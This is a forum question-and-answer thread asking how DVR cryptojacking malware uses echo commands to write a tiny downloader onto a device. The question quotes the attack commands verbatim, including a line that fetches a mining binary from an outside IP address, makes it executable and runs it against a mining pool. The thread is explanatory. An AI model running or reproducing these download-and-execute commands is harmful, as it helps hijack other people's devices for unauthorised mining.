compromising DVRs to become bitcoin mining bot

Question

I read this article, about an exploit which highjacks a DVR to become a "bitcoin mining bot".

The heart of the attack is to send a binary using just echo comands to the device, which acts as a trivial wget (the device does not have any wget on its own):

echo -ne '\x00\x00\x00\x2f\x00\x00\x00\x1a\x00\x00 \x00\x00\x00\x00\x00\x05\x00\x00\x00\x00 \x00\x00\x00\x04\x00\x00\x00\x00\x00\x00 \x00\x31\x00\x00\x00\x00\x00 \x00\x00\x2a\x00\x00\x00\x1b\x00\x00\x00 \x14\x00\x00\x00' >> /var/run/rand0-btcminer-arm

This binary is then used to get the bitcoin mining sw itself

./rand0-btcminer-arm http://107.178.66.153/btcminer-arm && \
chmod u+x btcminer-arm && ./btcminer-arm -B -o \
stratum+tcp://204.124.183.242:3333 -t 4 -q && echo -ne '\x64\x6f\x6e\x65'

Can somebody please explain what exactly the echo command does, and how that works? Can really a few bytes representr a working "wget"?

score 0 · Answer 1 · edited Mar 17 '17 at 10:46

0

The echo is a shellcode that gets executed on the DVR. It stores a little file that is a program acting like wget. This program then gets called to fetch an other one (the mining program) that gets executed.

Sorry I was mistaken. As pointed out in the comments, please look at this thread A tiny version of wget (51 bytes?)

edited Mar 17 '17 at 10:46

Community

1

answered May 06 '14 at 09:09

Corneliux

207
1
4

compromising DVRs to become bitcoin mining bot

1 Answers1